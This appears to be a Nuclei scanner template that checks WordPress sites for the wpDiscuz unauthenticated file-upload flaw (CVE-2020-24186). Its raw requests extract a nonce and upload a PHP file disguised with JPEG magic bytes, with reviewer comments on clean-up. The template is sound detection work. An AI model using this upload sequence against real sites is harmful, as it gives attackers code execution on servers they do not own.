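id: CVE-2020-24186

info:
  name: Unauthenticated File upload wpDiscuz WordPress plugin Remote Code Execution
  author: Ganofins
  severity: critical
  description: WordPress wpDiscuz plugin versions 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
  reference:
    - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.00
    cve-id: CVE-2020-24186
    cwe-id: CWE-434
  tags: cve,cve2020,wordpress,wp-plugin,rce,upload

# NOTE(review): this check is intrusive. The second request uploads a real PHP
# file (rce.php) through the plugin's wmuUploadFiles AJAX action. On a
# vulnerable site that file stays in the uploads directory after the scan and is
# reachable at the URL reported by the non-internal extractor below, so record
# that URL and remove the file during clean-up. phpinfo() also discloses server
# configuration to anyone who can reach it.
requests:
  - raw:
      # Step 1: fetch a post page so the plugin renders its JS config, which
      # carries the "wmuSecurity" nonce required by the upload action.
      # postId 1 is hard-coded here and in the upload request; if post 1 does
      # not exist or wpDiscuz is not active on it, no nonce is extracted and
      # the check cannot fire on an otherwise vulnerable site.
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      # Step 2: call wmuUploadFiles with the extracted nonce. The file part
      # starts with decoded JPEG magic bytes (FF D8 FF E1 ... "Exif") followed
      # by PHP code, so a content-based image check can pass while the .php
      # extension is preserved. The declared part Content-Type (image/png) does
      # not match those bytes; it is carried over from the public PoC and is
      # presumably not what the plugin validates -- confirm before changing.
      # wmuAttachmentsData is sent as the literal string "undefined", which
      # looks like what the browser form submits when no prior attachments
      # exist; kept as in the PoC.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="action"

        wmuUploadFiles
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_nonce"

        {{wmuSecurity}}
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmuAttachmentsData"

        undefined
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
        Content-Type: image/png

        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
        <?php phpinfo();?>
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="postId"

        1
        ------WebKitFormBoundary88AhjLimsDMHU1Ak--

    extractors:
      # Internal only: the nonce reused as {{wmuSecurity}} in the upload
      # request. WordPress nonces are lowercase hex, so [a-z0-9]+ is enough.
      - type: regex
        part: body
        internal: true
        name: wmuSecurity
        group: 1
        regex:
          - 'wmuSecurity":"([a-z0-9]+)'

      # Reported to the operator: the URL of the uploaded file as returned in
      # the upload response (JSON-escaped, i.e. with \/ for /). Everything up
      # to the closing quote is captured so a host name or generated file name
      # containing characters outside [a-z0-9:/.-] (uppercase, underscore,
      # percent-encoding) is not silently truncated. Use this URL for clean-up.
      - type: regex
        part: body
        group: 1
        regex:
          - '"url":"([^"]+)"'

    matchers-condition: and
    matchers:
      # admin-ajax.php answers 200 for failed uploads as well, so the status
      # check only filters hard errors; the JSON word matcher below decides.
      - type: status
        status:
          - 200

      # A successful upload response carries "success":true plus the
      # attachment descriptor fields. Only the upload is verified here; the
      # template does not fetch the uploaded file to confirm it executes.
      - type: word
        part: body
        condition: and
        words:
          - 'success":true'
          - 'fullname'
          - 'shortname'
          - 'url'

# Enhanced by mp on 2022/03/27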